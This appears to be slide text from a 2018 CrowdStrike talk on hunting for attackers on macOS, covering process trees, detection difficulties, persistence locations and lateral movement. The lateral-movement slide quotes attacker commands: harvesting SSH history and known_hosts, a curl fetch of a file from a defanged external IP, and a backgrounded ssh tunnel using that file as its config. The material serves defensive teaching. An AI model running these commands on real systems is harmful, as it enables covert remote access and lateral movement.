2. `WHOAMI`
§ Incident Responder
§ Hunter
§ Detections Engineer
§ CrowdStrike SCAR Team
§ Author of OS X Incident Response
Scripting and Analysis
2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
3. MAC BASIC HUNTING OVERVIEW
2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.
4. THE IMPORTANCE OF THE PROCESS TREE
launchd
Sudoers File
Modified
vimjamf bash
launchd
Sudoers File
Modified
vim/var/tmp/a bash
5. DETECTION/ANALYSIS DIFFICULTIES
§ All the commands an attacker could ever need are on the system
§ Admin and Attacker activity can look like the same thing
§ Backdoors can be written in many different languages
§ Malware sample size incredibly small compared to Windows
17. STANDARD ASEPS
§ System Integrity Protection level
§ /System/Library/LaunchAgents
§ /System/Library/LaunchDaemons
§ Root Level
§ /Library/LaunchAgents
§ /Library/LaunchDaemons
§ User Level
§ ~/Library/LaunchAgents
§ ~/Library/LaunchDaemons
§ Some schedulers
§ cron
§ periodic
§ Mac malware has not reached the same level of creatively hiding its ASEPS
25. LATERAL MOVEMENT
§ grep ssh .bash_history
§ cat known_hosts
§ curl -sO hxxp://61.78.62.21:8080/rs
§ ssh -TNfq -Frs
• -T -> Disable pseudo-tty allocation.
• -N -> Do not execute a remote command. This is useful for just forwarding ports (protocol
version 2 only).
• -f -> Requests ssh to go to background just before command execution
• -F -> Specifies an alternative per-user configuration file.